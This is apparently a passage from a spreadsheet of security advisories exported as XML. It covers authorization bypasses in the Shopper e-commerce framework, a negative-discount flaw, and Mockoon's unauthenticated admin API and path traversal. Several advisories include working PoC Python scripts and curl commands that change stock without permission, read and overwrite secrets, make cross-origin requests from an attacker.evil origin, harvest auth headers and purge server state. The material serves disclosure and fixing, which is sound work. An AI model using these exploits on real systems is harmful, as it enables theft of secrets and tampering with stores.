A lack of authorization control was discovered in the `stockAction()` method in `packages/admin/src/Livewire/Components/Products/VariantStock.php`. The component exposes a `public $variant` property without the `#[Locked]` attribute, so the variant ID is client-mutable via the Livewire wire payload. The `stockAction()` returns an Action with no `-&gt;authorize(...)` chain, meaning any authenticated admin-panel session, including browse-only staff who hold zero edit permissions, can call this action to adjust inventory levels for any product variant. The combination of missing authorization and an unlocked model binding lets the attacker both bypass the permission gate and redirect the mutation to an arbitrary variant in the database.
## Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H  Score: 8.1  (High)
## Affected files
- `packages/admin/src/Livewire/Components/Products/VariantStock.php:34-91`
```php
// Line 34 - unprotected, client-mutable variant binding
public $variant;
// Lines 36-91 - no -&gt;authorize(...) on the Action
public function stockAction(): Action
{
    return Action::make('stock')
        -&gt;label(__('shopper::forms.actions.update'))
        -&gt;color('gray')
        -&gt;icon(Untitledui::Package)
        -&gt;modalHeading(__('shopper::pages/products.modals.variants.title'))
        -&gt;modalWidth(Width::Large)
        -&gt;schema([
            Select::make('inventory')
                -&gt;label(__('shopper::pages/products.inventory_name'))
                -&gt;options(Inventory::query()-&gt;pluck('name', 'id'))
                -&gt;native(false)
                -&gt;required(),
            TextInput::make('quantity')
                -&gt;label(__('shopper::forms.label.quantity'))
                -&gt;placeholder('-10 or -5 or 50, etc')
                -&gt;numeric()
                -&gt;required(),
        ])
        -&gt;action(function (array $data): void {
            // ...calls $this-&gt;variant-&gt;mutateStock(...) or decreaseStock(...)
            // with no permission check anywhere in this path
        });
}
```
## Steps to reproduce
Prerequisites: an admin-panel account with any role (including a role that holds only `browse_products` or `browse_orders`). No `edit_product_variants` permission is required.
```bash
# Step 1: Log in and obtain a session cookie and Livewire CSRF token.
# Obtain them from a normal browser login, then use them below.
SESSION="laravel_session=&lt;your_session_value&gt;"
XSRF="X-XSRF-TOKEN: &lt;url-decoded-value-of-XSRF-TOKEN-cookie&gt;"
# Step 2: Load the product variant page for any variant ID (e.g., 1).
# Capture the Livewire snapshot from the page source.
# Step 3: Call the stock action on an arbitrary variant.
# The wire payload sets "component.variant" to any variant ID in the database.
curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "$XSRF" \
  -H "Cookie: $SESSION" \
  -d '{
    "components": [{
      "snapshot": "{\"id\":\"VARIANT_STOCK_COMPONENT_ID\",\"data\":{\"variant\":42},\"checksum\":\"...\"}",
      "updates": {},
      "calls": [{"path":"","method":"callAction","params":["stock",{"inventory":1,"quantity":999}]}]
    }]
  }'
# Expected: HTTP 200, variant 42 stock increased by 999 regardless of caller permissions.
```
## Proof of concept
```python
#!/usr/bin/env python3
"""
VariantStock authorization bypass PoC.
Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  value of the laravel_session cookie
  XSRF_TOKEN      URL-decoded value of the XSRF-TOKEN cookie
  COMPONENT_ID    Livewire component snapshot ID (from page source)
  VARIANT_ID      integer ID of any target variant
  INVENTORY_ID    integer ID of the target inventory location
  QUANTITY        integer quantity adjustment (positive or negative)
"""
import json
import os
import requests
base_url      = os.environ['BASE_URL']
session       = os.environ['SESSION_COOKIE']
xsrf          = os.environ['XSRF_TOKEN']
component_id  = os.environ['COMPONENT_ID']
variant_id    = int(os.environ['VARIANT_ID'])
inventory_id  = int(os.environ['INVENTORY_ID'])
quantity      = int(os.environ['QUANTITY'])
headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}
snapshot = json.dumps({
    'id': component_id,
    'data': {'variant': variant_id},
    'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})
payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{
            'path': '',
            'method': 'callAction',
            'params': ['stock', {
                'inventory': inventory_id,
                'quantity': quantity,
            }]
        }]
    }]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
```
## Impact
Any authenticated admin panel user, regardless of role, can set the inventory quantity of any product variant to an arbitrary value. A browse-only staff member holding only `browse_products` can zero out stock for every variant (triggering out-of-stock states store-wide) or inflate stock counts to bypass stock-gating at checkout. Because `$variant` is not locked, the attacker is not limited to variants visible on their current page; they can target any variant by its integer ID.
## Suggested fix
```php
// packages/admin/src/Livewire/Components/Products/VariantStock.php
use Livewire\Attributes\Locked;
#[Locked]                     // prevent client-side ID substitution
public $variant;
public function stockAction(): Action
{
    return Action::make('stock')
        -&gt;authorize('edit_product_variants')   // add this
        // ... rest of the action
```
## Credits
Reported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56829</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56830</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="inlineStr"/>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr"/>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>## Title
Missing authorization on Media sub-form store action allows unpermissioned product media update
## Description
A lack of authorization control on the `store()` method was found in `packages/admin/src/Livewire/Components/Products/Form/Media.php`. The security fix released for GHSA-h4mp-g9c6-xwph added `#[Locked]` to the `$product` property in this file but did not add an `authorize()` call to `store()`. The commit message for that fix (fcd0c59) explicitly names the five repaired sub-form components: Edit, Inventory, Seo, Shipping, Files. Media is absent from that list and absent from the published advisory. As a result, any authenticated admin-panel session, including a staff user holding only `browse_products`, can invoke `store()` on this component to replace the thumbnail and gallery images for any product without holding `edit_products`. Because `$product` is now `#[Locked]`, the attacker cannot redirect the write to an arbitrary product from the client side, but the permission gate is still absent, so the write succeeds against whichever product the component was initialized for.
## Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N  Score: 6.5  (Medium)
## Affected files
- `packages/admin/src/Livewire/Components/Products/Form/Media.php:64-76`
```php
// Lines 64-76 - store() with no authorize() call
public function store(): void
{
    $this-&gt;validate();
    $this-&gt;product-&gt;update($this-&gt;form-&gt;getState());  // overwrites thumbnail + gallery media
    $this-&gt;dispatch('product.updated');
    Notification::make()
        -&gt;body(__('shopper::pages/products.notifications.media_update'))
        -&gt;success()
        -&gt;send();
}
```
The five sibling components that were fixed in commit fcd0c59 each now have:
```php
public function store(): void
{
    $this-&gt;authorize('edit_products');  // present in Edit, Inventory, Seo, Shipping, Files
    // ...
}
```
`Media.store()` does not.
## Steps to reproduce
Prerequisites: an admin-panel account whose role holds `browse_products` but NOT `edit_products`.
```bash
SESSION="laravel_session=&lt;your_session_value&gt;"
XSRF="&lt;url-decoded-XSRF-TOKEN-cookie-value&gt;"
# Step 1: Load a product edit page as an admin to obtain the Media component's
#         Livewire snapshot ID and the product's public ID.
#         The component snapshot appears in the HTML source as data-livewire-snapshot.
# Step 2: As the low-privilege browse-only session, call store() on the Media component,
#         pointing at the captured component state.
curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "X-XSRF-TOKEN: $XSRF" \
  -H "Cookie: $SESSION" \
  -H "X-Livewire: 1" \
  -d '{
    "components": [{
      "snapshot": "&lt;snapshot JSON from page source with product locked&gt;",
      "updates": {},
      "calls": [{"path":"","method":"store","params":[]}]
    }]
  }'
# Expected: HTTP 200, product thumbnail and images updated without edit_products.
```
## Proof of concept
```python
#!/usr/bin/env python3
"""
Media component authorization bypass PoC.
Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  laravel_session cookie value (browse-only staff session)
  XSRF_TOKEN      URL-decoded XSRF-TOKEN cookie value
  SNAPSHOT_JSON   the full Livewire snapshot JSON string for the Media component
                  (copy from data-livewire-snapshot in the product edit page source)
The snapshot already contains the locked product ID, so no ID substitution is needed.
The bypass is purely the missing authorize() on store().
"""
import json
import os
import requests
base_url = os.environ['BASE_URL']
session  = os.environ['SESSION_COOKIE']
xsrf     = os.environ['XSRF_TOKEN']
snapshot = os.environ['SNAPSHOT_JSON']
headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}
payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{'path': '', 'method': 'store', 'params': []}]
    }]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
```
## Impact
A staff member with only `browse_products` can update the thumbnail and product image gallery for any product. On a storefront, this means replacing product images with adversarial content (defaced images, misleading product photos) without leaving an edit trail that an admin watching the product edit history would normally associate with a permission-holding editor. The impact is limited to the products whose edit pages the attacker has visited in their browser session (the product ID is locked server-side), but that covers every product the browse-only user has ever loaded.
## Suggested fix
```php
// packages/admin/src/Livewire/Components/Products/Form/Media.php
public function store(): void
{
    $this-&gt;authorize('edit_products');  // add this line
    $this-&gt;validate();
    $this-&gt;product-&gt;update($this-&gt;form-&gt;getState());
    $this-&gt;dispatch('product.updated');
    Notification::make()
        -&gt;body(__('shopper::pages/products.notifications.media_update'))
        -&gt;success()
        -&gt;send();
}
```
## Credits
Reported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56830</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56831</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="inlineStr"/>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr"/>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>## Summary
The Shopper Framework discount management functionality accepts negative discount values without server-side validation.
It was confirmed that negative fixed-amount discounts can be created through the administrative interface, persisted to the database, and subsequently processed by the cart/order calculation pipeline.
The application appears to assume that discount values are always positive but does not enforce this assumption during creation, storage, or calculation.
As a result, malformed discount records can influence financial calculations and produce unintended order totals.
---
## Affected Product
**Package:** shopper/framework
**Version Tested:** 2.8.1
---
## Vulnerability Type
* Business Logic Vulnerability
* Improper Input Validation (CWE-20)
---
## Description
While reviewing the discount functionality, it was discovered that the application accepts negative discount values through the administrative interface.
Example values tested:
```text
-50.00
-99,999,999.00
```
The application accepted these values without validation and stored them in the database.
Example records observed in the `sh_discounts` table:
```text
1 | QCZ5Y3HESM | fixed_amount | -5000
4 | TOZKAHCB4S | fixed_amount | -9999999900
```
This demonstrates that negative discount values are successfully persisted.
---
## Steps to Reproduce
### 1. Create a Discount
Login as an administrator.
Navigate to:
```text
/cpanel/discounts
```
Create a new discount with the following values:
```text
Type: fixed_amount
Value: -99999999
```
Save the discount.
### 2. Observe Successful Creation
The discount is accepted by the application and displayed in the administration interface.
Example:
```text
Code: TOZKAHCB4S
Amount: -$99,999,999.00
```
### 3. Verify Database Persistence
Inspect the database:
```sql
select * from sh_discounts;
```
Observed entry:
```text
TOZKAHCB4S | fixed_amount | -9999999900
```
---
## Technical Analysis
### Discount Calculation
File:
```text
vendor/shopper/cart/src/Discounts/DiscountCalculator.php
```
Observed code:
```php
$fixedAmount = $discount-&gt;value;
```
The value is later processed without validation:
```php
$fixedAmount = min($fixedAmount, $applicableSubtotal);
```
When a negative value is supplied:
```php
min(-9999999900, 10000)
```
returns:
```php
-9999999900
```
allowing the negative value to continue through the calculation pipeline.
The resulting adjustment values are inserted into the database:
```php
CartLineAdjustment::query()-&gt;insert($adjustments);
```
No validation was identified to ensure that discount amounts are positive before calculations occur.
---
### Final Total Calculation
File:
```text
vendor/shopper/cart/src/Pipelines/Calculate.php
```
Observed logic:
```php
$context-&gt;total = max(
    0,
    $context-&gt;taxInclusive
        ? $context-&gt;subtotal - $context-&gt;discountTotal
        : $context-&gt;subtotal - $context-&gt;discountTotal + $context-&gt;taxTotal
);
```
Because negative discount values are allowed to reach this stage, financial calculations are performed using malformed discount data.
Example:
```text
Subtotal      = 10000
DiscountTotal = -5000
```
Resulting calculation:
```text
10000 - (-5000)
```
Result:
```text
15000
```
This demonstrates that negative discount values directly affect order total calculations.
---
## Impact
The following was confirmed:
* Negative discount values are accepted.
* Negative discount values are persisted.
* Negative discount values are processed by the discount calculation engine.
* Negative discount values affect order total calculations.
Potential consequences include:
* Incorrect pricing calculations.
* Financial data integrity issues.
* Unexpected order totals.
* Violated assumptions within downstream pricing logic.
* Future vulnerabilities if additional components assume discount values are always positive.
Because Shopper is a headless e-commerce administration framework and does not ship with a customer-facing storefront, it was not verified a customer-facing exploitation path.
However, malformed discount records currently propagate through pricing calculations without validation.
---
## Recommendation
Implement server-side validation enforcing positive discount values before persistence and before entering the calculation pipeline.
Suggested validation:
### Fixed Amount Discounts
```text
value &gt; 0
```
### Percentage Discounts
```text
0 &lt; value &lt;= 100
```
Additionally, existing discount records should be validated before calculation to prevent malformed data from influencing pricing logic.
---
## Environment
```text
Shopper Framework 2.8.1
Laravel 12.61.1
PHP 8.4.16
SQLite
```</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56831</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59148</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>npm:@mockoon/cli, npm:@mockoon/commons-server</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr">
        <is>
          <t>9.7.0</t>
        </is>
      </c>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr"/>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-732, CWE-942</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>## Summary
Mockoon's admin API ([`commons-server/src/libs/server/admin-api.ts`](https://github.com/mockoon/mockoon/blob/4375a8f/packages/commons-server/src/libs/server/admin-api.ts)) is mounted on the same Express listener as the user-defined mock routes, **enabled by default** in every shipped runtime (commons-server, CLI, serverless), serves **`Access-Control-Allow-Origin: *` on every endpoint with all HTTP methods allowed including PUT/POST/PATCH/DELETE/PURGE and `Content-Type` in `Access-Control-Allow-Headers`**, and has **zero authentication of any kind** (no token, no shared secret, no `MOCKOON_ADMIN_TOKEN` env var — searched the repo, returns zero hits).
Any unauthenticated caller who can reach the mock server's port (default `0.0.0.0:3000`) can:
- Read every `MOCKOON_*` env var used by the operator as secret material in templates (`getEnvVar` helper).
- **Write arbitrary process env vars (no prefix check on the WRITE path)** — poison operator's `MOCKOON_API_KEY`, `MOCKOON_JWT_SECRET`, …, or write process-level vars like `AWS_SECRET_ACCESS_KEY` that the surrounding runtime consumes.
- **Rewrite every mock route's body / status / headers in-runtime** via `PUT /mockoon-admin/environment` — downstream consumers (frontend dev-server, CI test suite, integration partner) receive attacker-controlled responses and headers including `Set-Cookie`, `Location`, `Content-Security-Policy`, etc.
- Read transaction logs / SSE stream (consumer's request bodies + auth headers in clear).
- Read/write global template vars; purge state / data buckets / logs.
Because of the wildcard CORS reply, the attack **also lands cross-origin from a browser**: a developer who runs `mockoon-cli start ...` locally and visits a malicious website gets their mock state hijacked.
---
## Details
### Root cause
`packages/commons-server/src/libs/server/server.ts:127`:
```ts
private options: ServerOptions = {
  ...,
  enableAdminApi: true,        // ← default on
};
```
`packages/cli/src/commands/start.ts:200`:
```ts
enableAdminApi: !userFlags['disable-admin-api'],   // default true unless --disable-admin-api passed
```
`packages/serverless/src/libs/serverless.ts:21`:
```ts
enableAdminApi: true,          // ← default on, no flag to disable in the constructor
```
`packages/commons-server/src/libs/server/admin-api.ts:63-74` (permissive CORS on every admin endpoint):
```ts
app.use(`${adminApiPrefix}*`, (req, res, next) =&gt; {
  res.setHeaders(
    new Headers({
      'Access-Control-Allow-Origin': '*',
      'Access-Control-Allow-Methods':
        'GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS',
      'Access-Control-Allow-Headers':
        'Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With'
    })
  );
  next();
});
```
`packages/commons-server/src/libs/server/admin-api.ts:151-166` (no auth, no prefix check on WRITE):
```ts
const setEnvVarHandler = (req, res) =&gt; {
  try {
    const { key, value } = req.body;
    if (key !== undefined &amp;&amp; value !== undefined) {
      process.env[key] = value;                            // ← any process env, any value
      res.send({ message: `Environment variable '${key}' has been set to '${value}'` });
    } else {
      throw new Error('Key or value missing from request');
    }
  } catch (_error) {
    res.status(400).send({ message: 'Invalid request' });
  }
};
```
`packages/commons-server/src/libs/server/admin-api.ts:373-393` (the most impactful — runtime mock rewrite):
```ts
app.put(`${adminApiPrefix}/environment`, (req, res) =&gt; {
  try {
    const environment: Environment = EnvironmentSchema.validate(req.body).value;
    if (!environment) {
      res.status(400).send({ message: 'Invalid environment format' });
      return;
    }
    updateEnvironment(environment);                        // ← runtime mutation of every route response
    res.send({ message: 'Environment updated' });
  } catch (_error) {
    res.status(400).send({ message: 'Invalid environment format' });
  }
});
```
Default `hostname: ''` (`packages/commons/src/constants/environment-schema.constants.ts:33`) → Node binds `0.0.0.0`/`::` (confirmed via `lsof`). Migration #16 (`packages/commons/src/libs/migrations.ts:343`) also forces missing hostnames to `'0.0.0.0'`.
---
## PoC
### Live reproduction (2026-05-11, `@mockoon/cli@9.6.1`)
`npm install @mockoon/cli@9.6.1`. Minimal `env.json` with one route `GET /users/:id` whose response templates `{{getEnvVar 'MOCKOON_API_KEY'}}`. Start with:
```
MOCKOON_API_KEY="sk-operator-real-secret-DO_NOT_LEAK_xyz789" \
  mockoon-cli start --data env.json --port 3100 --repair --disable-log-to-file
```
Bind confirmed via `lsof`:
```
COMMAND  PID    USER  FD  TYPE  ...  NAME
node    39906  ...   14u  IPv6  ...  TCP *:3100 (LISTEN)    &lt;-- all interfaces
```
Baseline mock response:
```
$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}
```
#### 1) Read operator secret unauth
```
$ curl -s -i http://127.0.0.1:3100/mockoon-admin/env-vars/API_KEY
HTTP/1.1 200 OK
access-control-allow-origin: *
{"key":"MOCKOON_API_KEY","value":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}
```
#### 2) Poison operator secret unauth → downstream consumer ingests attacker value
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-POISONED-BY-ATTACKER"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-POISONED-BY-ATTACKER'"}
$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-POISONED-BY-ATTACKER"}
```
#### 3) Write arbitrary non-`MOCKOON_*` env var (no prefix gate)
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"AWS_SECRET_ACCESS_KEY","value":"overwritten-by-attacker"}'
{"message":"Environment variable 'AWS_SECRET_ACCESS_KEY' has been set to 'overwritten-by-attacker'"}
```
#### 4) Cross-origin CSRF from `https://attacker.evil`
```
$ curl -s -i -X OPTIONS http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Access-Control-Request-Method: POST" \
    -H "Access-Control-Request-Headers: Content-Type"
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-EXFIL-FROM-attacker.evil"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-EXFIL-FROM-attacker.evil'"}
```
Wildcard `Access-Control-Allow-Origin: *` + `Access-Control-Allow-Methods` covering PUT/POST/PATCH + `Content-Type` in `Access-Control-Allow-Headers` mean the browser preflight passes for non-simple JSON POSTs. A developer who visits a malicious site while their Mockoon CLI is running is fully exploitable from JavaScript.
#### 5) Rewrite every mock route via unauth `PUT /environment`
```
$ curl -s -X PUT http://127.0.0.1:3100/mockoon-admin/environment \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{ ...full env JSON with route response rewritten to body "ATTACKER_PWNED",
          statusCode 418, header X-Pwned: by-attacker.evil... }'
{"message":"Environment updated"}
$ curl -s -i http://127.0.0.1:3100/users/99
HTTP/1.1 418 I'm a Teapot
X-Pwned: by-attacker.evil
Content-Type: application/json
{"id":"99","name":"ATTACKER_PWNED","role":"admin","backdoor":true}
```
#### 6) Read transaction logs / SSE stream → harvest consumer's auth headers
```
$ curl -s http://127.0.0.1:3100/mockoon-admin/logs?limit=2
```
Each log entry includes consumer's `request.headers` (Authorization / Cookie / X-API-Key), `request.body`, `request.urlPath`, and the response served back — continuous info-disclosure of every API call the legitimate consumer makes against the mock. `GET /mockoon-admin/events` streams the same data live via SSE.
#### 7) Purge state (DoS)
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/state/purge
{"response":"Server has been reset to its initial state"}
```
---
## Impact
In typical local-dev mode (CVSS 8.8 High):
- Secret read of every `MOCKOON_*` env var (API keys, JWT signing keys, OAuth client secrets).
- Secret write to any `process.env` key — poison operator's secrets, swap AWS/SDK creds.
- Runtime rewrite of every mock route's body / status / headers → downstream consumer ingests attacker-controlled data + headers (Set-Cookie, Location, CSP).
- Auth-token harvesting via transaction logs / SSE stream.
- State purge / DoS.
In network-exposed deployment (CVSS 9.4 Critical):
- All of the above without user interaction. The serverless wrapper hardcodes `enableAdminApi: true`; `mockoon/cli` Docker image inherits the same default and is commonly deployed in shared CI / staging environments.
---
## Suggested fix
1. Require explicit authentication on the admin API by default. Print an auto-generated bearer token on CLI startup (Jupyter-style), keyed off `MOCKOON_ADMIN_TOKEN` env var, compared with `crypto.timingSafeEqual`.
2. Stop sending `Access-Control-Allow-Origin: *` on admin endpoints. Default: no CORS at all (browser will block cross-origin reads). Operators who run a separate admin UI on another origin can opt-in with `--admin-api-origin`.
3. Bind the admin API to loopback by default, on a separate port or behind a remote-address check.
4. Add a prefix check on the `setEnvVarHandler` matching the prepend behavior on the GET handler — reject any `key` that doesn't start with `envVarsPrefix`.
5. Add `SECURITY.md` with disclosure instructions.
6. Ship `@mockoon/serverless` and `mockoon/cli` Docker image with `enableAdminApi: false` by default; opt-in via flag.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59148</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59149</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>npm:@mockoon/cli, npm:@mockoon/commons-server</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr">
        <is>
          <t>9.7.0</t>
        </is>
      </c>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr"/>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>## Summary
A `FILE` response whose `filePath` embeds request data (e.g. `"/srv/public/{{queryParam 'name'}}"`, the documented way to let the client pick a file) is confined by `getSafeFilePath` with `resolvedPath.startsWith(staticBaseDir)`. That prefix test has no path-separator boundary, so a `../`-escaped path whose absolute form string-prefixes the base directory passes. An unauthenticated client reads files from sibling paths outside the served directory.
## Details
`packages/commons-server/src/libs/server/server.ts`, `getSafeFilePath` (line 2315). The static base is the text before the first `{{`, resolved to an absolute path; the parsed `filePath` is then bounded by a string-prefix check:
```ts
const staticBaseDir = staticBaseMatch ? resolve(staticBaseMatch[1]) : null;     // 2336
const parsedFilePath = TemplateParser({ ... request ... });                     // request-controlled
const resolvedPath = resolvePath(parsedFilePath);
if (isPathAbsolute) {
  if (!staticBaseDir || !resolvedPath.startsWith(staticBaseDir)) {              // 2355
    throw new Error(`Access to absolute path outside of the original static base directory (${resolvedPath})`);
  }
} else if (!resolvedPath.startsWith(this.options.environmentDirectory)) {       // 2362
  throw new Error(`Access to relative path outside of the environment base directory (${resolvedPath})`);
}
```
With `"/srv/public/{{queryParam 'name'}}"`, `staticBaseDir = /srv/public`. A request `name=../public_backup/.env` resolves to `/srv/public_backup/.env`, and `"/srv/public_backup/.env".startsWith("/srv/public")` is `true` → served. Any sibling whose absolute path begins with the string `/srv/public` is reachable; the relative branch (`:2362`) is the same against `environmentDirectory`. A correct check appends `sep` to the base, or rejects when `relative(base, resolvedPath)` starts with `..`.
`filePath` is request-controlled (`queryParam`/`urlParam`/header/body via `TemplateParser`) for every `FILE` response: HTTP `sendFile` (`:1762`), WebSocket (`:1145`), callbacks (`:1586`).
## PoC
```sh
cat &gt; /tmp/poc.sh &lt;&lt;'POC'
set -e
mkdir -p /work/public /work/public_backup &amp;&amp; cd /work
echo 'public landing page' &gt; public/index.txt
echo 'AWS_SECRET_ACCESS_KEY=redacted' &gt; public_backup/.env
echo 'Michael, michael@example.com, 555-22-7741' &gt; public_backup/customers.csv
cat &gt; env.json &lt;&lt;'JSON'
{"uuid":"00000000-0000-0000-0000-000000000001","lastMigration":33,"name":"f","port":3000,"hostname":"","folders":[],
"routes":[{"uuid":"11111111-0000-0000-0000-000000000001","type":"http","documentation":"","method":"get","endpoint":"download",
"responses":[{"uuid":"22222222-0000-0000-0000-000000000001","body":"","latency":0,"statusCode":200,"label":"","headers":[],
